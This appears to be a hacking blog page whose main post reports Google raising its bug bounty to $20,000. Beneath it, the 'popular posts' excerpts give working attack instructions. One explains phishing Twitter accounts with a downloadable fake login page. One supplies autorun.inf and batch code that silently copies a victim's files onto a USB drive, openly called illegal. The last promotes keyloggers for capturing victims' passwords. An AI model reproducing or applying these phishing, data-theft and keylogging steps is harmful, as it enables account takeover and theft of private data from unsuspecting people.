Skip to main content

Google Raises Bug Bounty – Great News For Hackers

A good news for the hacking community- The internet giant Google has raised the bounties from $3133 to $20,000.Most companies that are in the business of providing software or services are willing to pay industrious and benevolent hackers who find bugs in the code. Google has been making use of these folks for quite some time, but now Mountain View is increasing its rewards dramatically in an effort to encourage more people to join the bug hunt. Google previously handed out a maximum of $3133.70, but now will offer up to $20,000 per bug.
“When we get more bug reports, we get more bug fixes,” Google security team manager Adam Mein told AFP. “That is good for our users; that is good for us.”
Google has paid out approximately $460,000 since it established the Vulnerability Reward Program.This rate change increases the incentive for security researchers and the average denizen of the internet to disclose the bugs spotted in Google web services to the source.
At Google’s Pwnium contest in March, Google paid out $60,000 prizes to anyone that could exploit the Chrome browser. Two people managed to do so, and collected the money. Even at that rate, security researchers have made it clear the exploits would have been worth more if sold to malicious individuals. Google’s $20,000 top payment is likely still far below the market rate.
Not all bugs will warrant the new $20,000 payout. Only “critical bugs” that allow remote code execution will be at that level. SQL injections or authentication bypasses will still net you a hefty $10,000 prize, but amounts will vary depending on which Google service is affected.”We want them to know the reward is there for them if they find the most severe bugs,” Mein said.
Bugs found in more sensitive services such as Google smartphone “Wallet” software tends to merit more generous rewards. So start working and earn.

Comments

Popular posts from this blog

How to Hack a Twitter Account

Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it

How to steal data using your USB flash drive

Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou